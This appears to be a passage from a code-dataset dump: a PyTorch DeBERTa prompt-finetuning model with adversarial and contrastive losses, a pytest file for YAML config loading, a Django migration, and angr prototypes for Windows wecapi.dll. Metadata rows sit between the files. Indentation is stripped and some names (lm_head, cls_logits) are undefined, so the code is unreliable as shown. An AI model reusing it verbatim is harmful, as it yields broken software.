self.pooler = ContextPooler(config)
output_dim = self.pooler.output_dim
self.classifier = torch.nn.Linear(output_dim, self.num_labels)
drop_out = getattr(config, "cls_dropout", None)
drop_out = self.config.hidden_dropout_prob if drop_out is None else drop_out
self.dropout = StableDropout(drop_out)
classification_list = [self.pooler, self.dropout,self.classifier]
self.classifier = nn.Sequential(*classification_list)
# self.cls = DebertaV2OnlyMLMHead(config)
self.map = nn.Linear(config.hidden_size, config.hidden_size)
self.init_weights()
# These attributes should be assigned once the model is initialized
self.model_args = None
self.data_args = None
self.label_word_list = None
self.K = 1
self.step_size=1e-5
self.adv_lc = SymKlCriterion()
self.contra_lc = ContrastiveLoss()
# import pdb
# pdb.set_trace()
#self.step_size=config.step_size
# For regression
self.lb = None
self.ub = None
# For auto label search.
self.return_full_softmax = None
def get_constrast_loss(self,
input_ids=None,
attention_mask=None,
mask_pos=None,
labels=None,
inputs_embeds=None):
self.cos = nn.CosineSimilarity(dim=-1)
_, sequence_mask_output_1 = self.encode(input_ids, attention_mask, mask_pos, inputs_embeds)
_, sequence_mask_output_2 = self.encode(input_ids, attention_mask, mask_pos, inputs_embeds)
sequence_mask_output_1= self.lm_head.dense(sequence_mask_output_1)
sequence_mask_output_2 = self.lm_head.dense(sequence_mask_output_2)
# input_args = [input_ids, attention_mask, mask_pos, labels, None, 1]
# embed = self.forward(*input_args)
#
# vat_args = [input_ids, attention_mask, mask_pos, labels, embed, 2]
#
# adv_logits, outputs = self.forward(*vat_args)
#
# logit_mask = F.softmax(logits, dim=-1)[torch.arange(adv_logits.size(0)), labels] > 0.7
#
# outputs = outputs[logit_mask]
# seq_outputs = sequence_mask_output[logit_mask]
# new_label = labels[logit_mask]
# #
# #
# rand_perm = torch.randperm(outputs.size(0))
# rand_outputs = outputs[rand_perm, :]
# rand_label = new_label[rand_perm]
# pair_label = (new_label == rand_label).long()
#
# seq_outputs = self.map(seq_outputs)
# rand_outputs = self.map(rand_outputs)
pair_labels = (labels.unsqueeze(1) == labels.unsqueeze(0)).float()
# import pdb
# pdb.set_trace()
contra_loss = self.contra_lc(sequence_mask_output_1.unsqueeze(1), sequence_mask_output_2.unsqueeze(0), pair_labels)
if torch.isnan(contra_loss):
return 0
return contra_loss
def get_adv_loss(self,
input_ids=None,
attention_mask=None,
mask_pos=None,
labels=None,
inputs_embeds=None):
logits, sequence_mask_output = self.encode(input_ids, attention_mask, mask_pos, inputs_embeds)
input_args = [input_ids, attention_mask, mask_pos, labels, None, 1]
embed = self.forward(*input_args)
noise = generate_noise(embed, attention_mask)
for step in range(0, self.K):
vat_args = [input_ids, attention_mask, mask_pos, labels, embed + noise, 2]
adv_logits, _ = self.forward(*vat_args)
adv_loss = stable_kl(adv_logits, logits.detach(), reduce=False)
try:
delta_grad, = torch.autograd.grad(adv_loss, noise, only_inputs=True, retain_graph=False)
except:
import pdb
pdb.set_trace()
norm = delta_grad.norm()
if (torch.isnan(norm) or torch.isinf(norm)):
return 0
eff_delta_grad = delta_grad * self.step_size
delta_grad, eff_noise = norm_grad(delta_grad, eff_grad=eff_delta_grad)
noise = noise + delta_grad * self.step_size
# noise, eff_noise = self._norm_grad(delta_grad, eff_grad=eff_delta_grad, sentence_level=self.norm_level)
noise = noise.detach()
noise.requires_grad_()
vat_args = [input_ids, attention_mask, mask_pos, labels, embed + noise, 2]
adv_logits, sequence_mask_output = self.forward(*vat_args)
# ori_args = model(*ori_args)
# aug_args = [input_ids, token_type_ids, attention_mask, premise_mask, hyp_mask, task_id, 2, (embed + native_noise).detach()]
adv_loss = self.adv_lc(adv_logits, logits)
return adv_loss
def embed_encode(self, input_ids):
embedding_output = self.deberta.embeddings.word_embeddings(input_ids)
return embedding_output
def encode(self, input_ids=None, attention_mask=None, token_type_ids=None, mask_pos=None, inputs_embeds=None,
return_full_softmax=False):
batch_size = input_ids.size(0)
if mask_pos is not None:
mask_pos = mask_pos.squeeze()
# Encode everything
if inputs_embeds is None:
outputs = self.deberta(
input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids
)
else:
outputs = self.deberta(
None,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
inputs_embeds=inputs_embeds
)
# Get <mask> token representation
sequence_output = outputs[0]
sequence_mask_output = sequence_output[torch.arange(sequence_output.size(0)), mask_pos]
# Logits over vocabulary tokens
prediction_mask_scores = self.cls(sequence_mask_output)
# sequence_mask_output = self.lm_head.dense(sequence_mask_output)
# Exit early and only return mask logits.
if return_full_softmax:
return prediction_mask_scores
# Return logits for each label
logits = []
for label_id in range(len(self.label_word_list)):
logits.append(prediction_mask_scores[:, self.label_word_list[label_id]].unsqueeze(-1))
logits = torch.cat(logits, -1)
# Regression task
if self.config.num_labels == 1:
logsoftmax = nn.LogSoftmax(-1)
logits = logsoftmax(logits) # Log prob of right polarity
if self.model_args.hybrid == 1:
cls_logits = self.classifier(sequence_output)
return (logits, cls_logits), sequence_mask_output
return logits, sequence_mask_output
def forward(
self,
input_ids=None,
attention_mask=None,
token_type_ids=None,
mask_pos=None,
labels=None,
inputs_embeds=None,
fwd_type=0,
block_flag=None
):
if fwd_type == 2:
assert inputs_embeds is not None
return self.encode(input_ids=input_ids, attention_mask=attention_mask, token_type_ids=token_type_ids,
mask_pos=mask_pos, inputs_embeds=inputs_embeds)
elif fwd_type == 1:
return self.embed_encode(input_ids)
if self.data_args.continuous_prompt == 1 and block_flag is not None:
inputs_embeds = self.generate_continuous_prompt_inputs(input_ids, block_flag)
logits, sequence_mask_output = self.encode(input_ids, attention_mask, token_type_ids, mask_pos, inputs_embeds)
if self.model_args.hybrid == 1:
logits = logits[0]
cls_logits = logits[1]
loss = None
if labels is not None:
if self.num_labels == 1:
# Regression task
loss_fct = nn.KLDivLoss(log_target=True)
labels = torch.stack([1 - (labels.view(-1) - self.lb) / (self.ub - self.lb),
(labels.view(-1) - self.lb) / (self.ub - self.lb)], -1)
loss = loss_fct(logits.view(-1, 2), labels)
else:
if labels.shape == logits.shape:
loss = F.kl_div(F.log_softmax(logits, dim=-1, dtype=torch.float32),
labels, reduction='batchmean')
else:
loss_fct = nn.CrossEntropyLoss()
loss = loss_fct(logits.view(-1, logits.size(-1)), labels.view(-1))
output = (logits,)
if self.num_labels == 1:
# Regression output
output = (torch.exp(logits[..., 1].unsqueeze(-1)) * (self.ub - self.lb) + self.lb,)
return ((loss,) + output) if loss is not None else output
class Debertav2ForPromptFinetuning(DebertaV2PreTrainedModel):
_keys_to_ignore_on_load_unexpected = [r"pooler"]
_keys_to_ignore_on_load_missing = [r"position_ids", r"predictions.decoder.bias"]
def __init__(self, config):
super().__init__(config)
self.num_labels = config.num_labels
self.deberta = DebertaV2Model(config)
self.cls = DebertaV2OnlyMLMHead(config)
#self.deberta = DebertaModel(config)
#self.cls = DebertaOnlyMLMHead(config)
self.pooler = ContextPooler(config)
output_dim = self.pooler.output_dim
self.classifier = torch.nn.Linear(output_dim, self.num_labels)
drop_out = getattr(config, "cls_dropout", None)
drop_out = self.config.hidden_dropout_prob if drop_out is None else drop_out
self.dropout = StableDropout(drop_out)
classification_list = [self.pooler, self.dropout,self.classifier]
self.classifier = nn.Sequential(*classification_list)
# self.cls = DebertaV2OnlyMLMHead(config)
self.map = nn.Linear(config.hidden_size, config.hidden_size)
self.init_weights()
# These attributes should be assigned once the model is initialized
self.model_args = None
self.data_args = None
self.label_word_list = None
self.K = 1
self.step_size=1e-5
self.adv_lc = SymKlCriterion()
self.contra_lc = ContrastiveLoss()
# import pdb
# pdb.set_trace()
#self.step_size=config.step_size
# For regression
self.lb = None
self.ub = None
# For auto label search.
self.return_full_softmax = None
def get_constrast_loss(self,
input_ids=None,
attention_mask=None,
mask_pos=None,
labels=None,
inputs_embeds=None):
self.cos = nn.CosineSimilarity(dim=-1)
_, sequence_mask_output_1 = self.encode(input_ids, attention_mask, mask_pos, inputs_embeds)
_, sequence_mask_output_2 = self.encode(input_ids, attention_mask, mask_pos, inputs_embeds)
sequence_mask_output_1= self.lm_head.dense(sequence_mask_output_1)
sequence_mask_output_2 = self.lm_head.dense(sequence_mask_output_2)
# input_args = [input_ids, attention_mask, mask_pos, labels, None, 1]
# embed = self.forward(*input_args)
#
# vat_args = [input_ids, attention_mask, mask_pos, labels, embed, 2]
#
# adv_logits, outputs = self.forward(*vat_args)
#
# logit_mask = F.softmax(logits, dim=-1)[torch.arange(adv_logits.size(0)), labels] > 0.7
#
# outputs = outputs[logit_mask]
# seq_outputs = sequence_mask_output[logit_mask]
# new_label = labels[logit_mask]
# #
# #
# rand_perm = torch.randperm(outputs.size(0))
# rand_outputs = outputs[rand_perm, :]
# rand_label = new_label[rand_perm]
# pair_label = (new_label == rand_label).long()
#
# seq_outputs = self.map(seq_outputs)
# rand_outputs = self.map(rand_outputs)
pair_labels = (labels.unsqueeze(1) == labels.unsqueeze(0)).float()
# import pdb
# pdb.set_trace()
contra_loss = self.contra_lc(sequence_mask_output_1.unsqueeze(1), sequence_mask_output_2.unsqueeze(0), pair_labels)
if torch.isnan(contra_loss):
return 0
return contra_loss
def get_adv_loss(self,
input_ids=None,
attention_mask=None,
mask_pos=None,
labels=None,
inputs_embeds=None):
logits, sequence_mask_output = self.encode(input_ids, attention_mask, mask_pos, inputs_embeds)
input_args = [input_ids, attention_mask, mask_pos, labels, None, 1]
embed = self.forward(*input_args)
noise = generate_noise(embed, attention_mask)
for step in range(0, self.K):
vat_args = [input_ids, attention_mask, mask_pos, labels, embed + noise, 2]
adv_logits, _ = self.forward(*vat_args)
adv_loss = stable_kl(adv_logits, logits.detach(), reduce=False)
try:
delta_grad, = torch.autograd.grad(adv_loss, noise, only_inputs=True, retain_graph=False)
except:
import pdb
pdb.set_trace()
norm = delta_grad.norm()
if (torch.isnan(norm) or torch.isinf(norm)):
return 0
eff_delta_grad = delta_grad * self.step_size
delta_grad, eff_noise = norm_grad(delta_grad, eff_grad=eff_delta_grad)
noise = noise + delta_grad * self.step_size
# noise, eff_noise = self._norm_grad(delta_grad, eff_grad=eff_delta_grad, sentence_level=self.norm_level)
noise = noise.detach()
noise.requires_grad_()
vat_args = [input_ids, attention_mask, mask_pos, labels, embed + noise, 2]
adv_logits, sequence_mask_output = self.forward(*vat_args)
# ori_args = model(*ori_args)
# aug_args = [input_ids, token_type_ids, attention_mask, premise_mask, hyp_mask, task_id, 2, (embed + native_noise).detach()]
adv_loss = self.adv_lc(adv_logits, logits)
return adv_loss
def embed_encode(self, input_ids):
embedding_output = self.deberta.embeddings.word_embeddings(input_ids)
return embedding_output
def encode(self, input_ids=None, attention_mask=None, mask_pos=None, inputs_embeds=None, return_full_softmax=False):
batch_size = input_ids.size(0)
if mask_pos is not None:
mask_pos = mask_pos.squeeze()
# Encode everything
if inputs_embeds is None:
outputs = self.deberta(
input_ids,
attention_mask=attention_mask
)
else:
outputs = self.deberta(
None,
attention_mask=attention_mask,
inputs_embeds=inputs_embeds
)
# Get <mask> token representation
sequence_output = outputs[0]
sequence_mask_output = sequence_output[torch.arange(sequence_output.size(0)), mask_pos]
# Logits over vocabulary tokens
prediction_mask_scores = self.cls(sequence_mask_output)
#sequence_mask_output = self.lm_head.dense(sequence_mask_output)
# Exit early and only return mask logits.
if return_full_softmax:
return prediction_mask_scores
# Return logits for each label
logits = []
for label_id in range(len(self.label_word_list)):
logits.append(prediction_mask_scores[:, self.label_word_list[label_id]].unsqueeze(-1))
logits = torch.cat(logits, -1)
# Regression task
if self.config.num_labels == 1:
logsoftmax = nn.LogSoftmax(-1)
logits = logsoftmax(logits) # Log prob of right polarity
return logits, sequence_mask_output
def forward(
self,
input_ids=None,
attention_mask=None,
mask_pos=None,
labels=None,
inputs_embeds=None,
fwd_type=0,
block_flag=None
):
if fwd_type == 2:
assert inputs_embeds is not None
return self.encode(input_ids=input_ids, attention_mask=attention_mask, mask_pos=mask_pos, inputs_embeds=inputs_embeds)
elif fwd_type == 1:
return self.embed_encode(input_ids)
logits, sequence_mask_output = self.encode(input_ids, attention_mask, mask_pos, inputs_embeds)
loss = None
if labels is not None:
if self.num_labels == 1:
# Regression task
loss_fct = nn.KLDivLoss(log_target=True)
labels = torch.stack([1 - (labels.view(-1) - self.lb) / (self.ub - self.lb), (labels.view(-1) - self.lb) / (self.ub - self.lb)], -1)
loss = loss_fct(logits.view(-1, 2), labels)
else:
if labels.shape == logits.shape:
loss = F.kl_div(F.log_softmax(logits, dim=-1, dtype=torch.float32),
labels, reduction='batchmean')
else:
loss_fct = nn.CrossEntropyLoss()
loss = loss_fct(logits.view(-1, logits.size(-1)), labels.view(-1))
if self.model_args.hybrid == 1:
cls_loss = loss_fct(cls_logits.view(-1, cls_logits.size(-1)), labels.view(-1))
loss = loss + cls_loss
output = (logits,)
if self.num_labels == 1:
# Regression output
output = (torch.exp(logits[..., 1].unsqueeze(-1)) * (self.ub - self.lb) + self.lb,)
return ((loss,) + output) if loss is not None else output
| 36.339862
| 169
| 0.606188
| 7,456
| 63,086
| 4.85287
| 0.051368
| 0.02609
| 0.035818
| 0.0296
| 0.857889
| 0.83191
| 0.814195
| 0.791864
| 0.785839
| 0.763066
| 0
| 0.008665
| 0.304838
| 63,086
| 1,735
| 170
| 36.360807
| 0.816395
| 0.119535
| 0
| 0.785908
| 0
| 0
| 0.014231
| 0.002788
| 0
| 0
| 0
| 0
| 0.004517
| 1
| 0.046974
| false
| 0
| 0.020777
| 0
| 0.135501
| 0.00271
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
fa224583108dc0e039048a5143c9e3b023f68ad3
| 2,116
|
py
|
Python
|
tests/small/config_test.py
|
noriyukipy/smilechat
|
a9c0ef93c35b2a1f3e9d1700391ae865544adfbc
|
[
"MIT"
] | 5
|
2021-01-01T12:34:23.000Z
|
2022-03-08T13:02:11.000Z
|
tests/small/config_test.py
|
noriyukipy/smilechat
|
a9c0ef93c35b2a1f3e9d1700391ae865544adfbc
|
[
"MIT"
] | null | null | null |
tests/small/config_test.py
|
noriyukipy/smilechat
|
a9c0ef93c35b2a1f3e9d1700391ae865544adfbc
|
[
"MIT"
] | 2
|
2020-09-20T10:41:51.000Z
|
2020-11-09T06:15:32.000Z
|
import tempfile
import os
from msgflow.config import load_yaml
def write(fp, content):
fp.write(content)
fp.flush()
def test_load_yaml():
yaml_str = """
service:
name: msgflow.service.CliService
config:
user_name: you
"""
want = {
"service": {
"name": "msgflow.service.CliService",
"config": {"user_name": "you"},
}
}
with tempfile.NamedTemporaryFile(mode="w+") as fp:
write(fp, yaml_str)
# Load and test config
got = load_yaml(fp.name)
assert got == want
def test_load_yaml_parse_with_env_var():
yaml_str = """
service:
name: msgflow.service.CliService
config:
user_name: ${USER_NAME}
password: ${PASSWORD}
"""
# Set environment variable
os.environ["USER_NAME"] = "name_from_env"
os.environ["PASSWORD"] = "password_from_env"
want = {
"service": {
"name": "msgflow.service.CliService",
"config": {"user_name": "name_from_env", "password": "password_from_env"},
}
}
with tempfile.NamedTemporaryFile(mode="w+") as fp:
write(fp, yaml_str)
# Load and test config
got = load_yaml(fp.name)
assert got == want
# Remove environment varialbe
del os.environ["USER_NAME"]
del os.environ["PASSWORD"]
def test_load_yaml_parse_with_env_var_but_not_defined():
yaml_str = """
service:
name: msgflow.service.CliService
config:
user_name: ${USER_NAME}
password: ${PASSWORD}
"""
# Set environment variable
os.environ["USER_NAME"] = "name_from_env"
# Not define PASSWORD env var
# os.environ["PASSWORD"] = "password_from_env"
want = {
"service": {
"name": "msgflow.service.CliService",
"config": {"user_name": "name_from_env", "password": "${PASSWORD}"},
}
}
with tempfile.NamedTemporaryFile(mode="w+") as fp:
write(fp, yaml_str)
# Load and test config
got = load_yaml(fp.name)
assert got == want
# Remove environment variable
del os.environ["USER_NAME"]
| 23
| 86
| 0.600662
| 247
| 2,116
| 4.931174
| 0.178138
| 0.078818
| 0.08867
| 0.123153
| 0.848112
| 0.815271
| 0.815271
| 0.815271
| 0.76601
| 0.71757
| 0
| 0
| 0.268904
| 2,116
| 91
| 87
| 23.252747
| 0.78733
| 0.113894
| 0
| 0.676923
| 0
| 0
| 0.339946
| 0.083646
| 0
| 0
| 0
| 0
| 0.046154
| 1
| 0.061538
| false
| 0.092308
| 0.046154
| 0
| 0.107692
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
d736e8ee7405b1bf28bd21cb9ca9faf341badb53
| 1,207
|
py
|
Python
|
xojbackend/app/core/migrations/0002_auto_20210208_1641.py
|
mazharkafi004/XOJ
|
834091418a7c4d008e44c3ff49df5955f38d9378
|
[
"MIT"
] | null | null | null |
xojbackend/app/core/migrations/0002_auto_20210208_1641.py
|
mazharkafi004/XOJ
|
834091418a7c4d008e44c3ff49df5955f38d9378
|
[
"MIT"
] | null | null | null |
xojbackend/app/core/migrations/0002_auto_20210208_1641.py
|
mazharkafi004/XOJ
|
834091418a7c4d008e44c3ff49df5955f38d9378
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.1.6 on 2021-02-08 16:41
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('core', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='user',
name='cf_handle',
field=models.CharField(blank=True, max_length=255),
),
migrations.AddField(
model_name='user',
name='cf_pass',
field=models.CharField(blank=True, max_length=255),
),
migrations.AddField(
model_name='user',
name='uri_handle',
field=models.CharField(blank=True, max_length=255),
),
migrations.AddField(
model_name='user',
name='uri_pass',
field=models.CharField(blank=True, max_length=255),
),
migrations.AddField(
model_name='user',
name='uva_handle',
field=models.CharField(blank=True, max_length=255),
),
migrations.AddField(
model_name='user',
name='uva_pass',
field=models.CharField(blank=True, max_length=255),
),
]
| 27.431818
| 63
| 0.545982
| 123
| 1,207
| 5.203252
| 0.325203
| 0.16875
| 0.215625
| 0.253125
| 0.784375
| 0.784375
| 0.784375
| 0.723438
| 0.723438
| 0.653125
| 0
| 0.045963
| 0.333057
| 1,207
| 43
| 64
| 28.069767
| 0.749068
| 0.037283
| 0
| 0.648649
| 1
| 0
| 0.07931
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.081081
| 0.027027
| 0
| 0.108108
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 9
|
ad1aa133ec45dd3a43990cc17ec13ed179e4802f
| 10,469
|
py
|
Python
|
angr/procedures/definitions/win32_wecapi.py
|
r4b3rt/angr
|
c133cfd4f83ffea2a1d9e064241e9459eaabc55f
|
[
"BSD-2-Clause"
] | null | null | null |
angr/procedures/definitions/win32_wecapi.py
|
r4b3rt/angr
|
c133cfd4f83ffea2a1d9e064241e9459eaabc55f
|
[
"BSD-2-Clause"
] | null | null | null |
angr/procedures/definitions/win32_wecapi.py
|
r4b3rt/angr
|
c133cfd4f83ffea2a1d9e064241e9459eaabc55f
|
[
"BSD-2-Clause"
] | null | null | null |
# pylint:disable=line-too-long
import logging
from ...sim_type import SimTypeFunction, SimTypeShort, SimTypeInt, SimTypeLong, SimTypeLongLong, SimTypeDouble, SimTypeFloat, SimTypePointer, SimTypeChar, SimStruct, SimTypeFixedSizeArray, SimTypeBottom, SimUnion, SimTypeBool
from ...calling_conventions import SimCCStdcall, SimCCMicrosoftAMD64
from .. import SIM_PROCEDURES as P
from . import SimLibrary
_l = logging.getLogger(name=__name__)
lib = SimLibrary()
lib.set_default_cc('X86', SimCCStdcall)
lib.set_default_cc('AMD64', SimCCMicrosoftAMD64)
lib.set_library_names("wecapi.dll")
prototypes = \
{
#
'EcOpenSubscriptionEnum': SimTypeFunction([SimTypeInt(signed=False, label="UInt32")], SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), arg_names=["Flags"]),
#
'EcEnumNextSubscription': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["SubscriptionEnum", "SubscriptionNameBufferSize", "SubscriptionNameBuffer", "SubscriptionNameBufferUsed"]),
#
'EcOpenSubscription': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32")], SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), arg_names=["SubscriptionName", "AccessMask", "Flags"]),
#
'EcSetSubscriptionProperty': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="EC_SUBSCRIPTION_PROPERTY_ID"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimStruct({"Anonymous": SimUnion({"BooleanVal": SimTypeInt(signed=True, label="Int32"), "UInt32Val": SimTypeInt(signed=False, label="UInt32"), "DateTimeVal": SimTypeLongLong(signed=False, label="UInt64"), "StringVal": SimTypePointer(SimTypeChar(label="Char"), offset=0), "BinaryVal": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "BooleanArr": SimTypePointer(SimTypeInt(signed=True, label="Int32"), offset=0), "Int32Arr": SimTypePointer(SimTypeInt(signed=True, label="Int32"), offset=0), "StringArr": SimTypePointer(SimTypePointer(SimTypeChar(label="Char"), offset=0), offset=0), "PropertyHandleVal": SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)}, name="<anon>", label="None"), "Count": SimTypeInt(signed=False, label="UInt32"), "Type": SimTypeInt(signed=False, label="UInt32")}, name="EC_VARIANT", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["Subscription", "PropertyId", "Flags", "PropertyValue"]),
#
'EcGetSubscriptionProperty': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="EC_SUBSCRIPTION_PROPERTY_ID"), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimStruct({"Anonymous": SimUnion({"BooleanVal": SimTypeInt(signed=True, label="Int32"), "UInt32Val": SimTypeInt(signed=False, label="UInt32"), "DateTimeVal": SimTypeLongLong(signed=False, label="UInt64"), "StringVal": SimTypePointer(SimTypeChar(label="Char"), offset=0), "BinaryVal": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "BooleanArr": SimTypePointer(SimTypeInt(signed=True, label="Int32"), offset=0), "Int32Arr": SimTypePointer(SimTypeInt(signed=True, label="Int32"), offset=0), "StringArr": SimTypePointer(SimTypePointer(SimTypeChar(label="Char"), offset=0), offset=0), "PropertyHandleVal": SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)}, name="<anon>", label="None"), "Count": SimTypeInt(signed=False, label="UInt32"), "Type": SimTypeInt(signed=False, label="UInt32")}, name="EC_VARIANT", pack=False, align=None), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["Subscription", "PropertyId", "Flags", "PropertyValueBufferSize", "PropertyValueBuffer", "PropertyValueBufferUsed"]),
#
'EcSaveSubscription': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=True, label="Int32"), arg_names=["Subscription", "Flags"]),
#
'EcDeleteSubscription': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=True, label="Int32"), arg_names=["SubscriptionName", "Flags"]),
#
'EcGetObjectArraySize': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["ObjectArray", "ObjectArraySize"]),
#
'EcSetObjectArrayProperty': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="EC_SUBSCRIPTION_PROPERTY_ID"), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimStruct({"Anonymous": SimUnion({"BooleanVal": SimTypeInt(signed=True, label="Int32"), "UInt32Val": SimTypeInt(signed=False, label="UInt32"), "DateTimeVal": SimTypeLongLong(signed=False, label="UInt64"), "StringVal": SimTypePointer(SimTypeChar(label="Char"), offset=0), "BinaryVal": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "BooleanArr": SimTypePointer(SimTypeInt(signed=True, label="Int32"), offset=0), "Int32Arr": SimTypePointer(SimTypeInt(signed=True, label="Int32"), offset=0), "StringArr": SimTypePointer(SimTypePointer(SimTypeChar(label="Char"), offset=0), offset=0), "PropertyHandleVal": SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)}, name="<anon>", label="None"), "Count": SimTypeInt(signed=False, label="UInt32"), "Type": SimTypeInt(signed=False, label="UInt32")}, name="EC_VARIANT", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["ObjectArray", "PropertyId", "ArrayIndex", "Flags", "PropertyValue"]),
#
'EcGetObjectArrayProperty': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="EC_SUBSCRIPTION_PROPERTY_ID"), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimStruct({"Anonymous": SimUnion({"BooleanVal": SimTypeInt(signed=True, label="Int32"), "UInt32Val": SimTypeInt(signed=False, label="UInt32"), "DateTimeVal": SimTypeLongLong(signed=False, label="UInt64"), "StringVal": SimTypePointer(SimTypeChar(label="Char"), offset=0), "BinaryVal": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "BooleanArr": SimTypePointer(SimTypeInt(signed=True, label="Int32"), offset=0), "Int32Arr": SimTypePointer(SimTypeInt(signed=True, label="Int32"), offset=0), "StringArr": SimTypePointer(SimTypePointer(SimTypeChar(label="Char"), offset=0), offset=0), "PropertyHandleVal": SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)}, name="<anon>", label="None"), "Count": SimTypeInt(signed=False, label="UInt32"), "Type": SimTypeInt(signed=False, label="UInt32")}, name="EC_VARIANT", pack=False, align=None), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["ObjectArray", "PropertyId", "ArrayIndex", "Flags", "PropertyValueBufferSize", "PropertyValueBuffer", "PropertyValueBufferUsed"]),
#
'EcInsertObjectArrayElement': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=True, label="Int32"), arg_names=["ObjectArray", "ArrayIndex"]),
#
'EcRemoveObjectArrayElement': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=True, label="Int32"), arg_names=["ObjectArray", "ArrayIndex"]),
#
'EcGetSubscriptionRunTimeStatus': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="EC_SUBSCRIPTION_RUNTIME_STATUS_INFO_ID"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimStruct({"Anonymous": SimUnion({"BooleanVal": SimTypeInt(signed=True, label="Int32"), "UInt32Val": SimTypeInt(signed=False, label="UInt32"), "DateTimeVal": SimTypeLongLong(signed=False, label="UInt64"), "StringVal": SimTypePointer(SimTypeChar(label="Char"), offset=0), "BinaryVal": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "BooleanArr": SimTypePointer(SimTypeInt(signed=True, label="Int32"), offset=0), "Int32Arr": SimTypePointer(SimTypeInt(signed=True, label="Int32"), offset=0), "StringArr": SimTypePointer(SimTypePointer(SimTypeChar(label="Char"), offset=0), offset=0), "PropertyHandleVal": SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)}, name="<anon>", label="None"), "Count": SimTypeInt(signed=False, label="UInt32"), "Type": SimTypeInt(signed=False, label="UInt32")}, name="EC_VARIANT", pack=False, align=None), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["SubscriptionName", "StatusInfoId", "EventSourceName", "Flags", "StatusValueBufferSize", "StatusValueBuffer", "StatusValueBufferUsed"]),
#
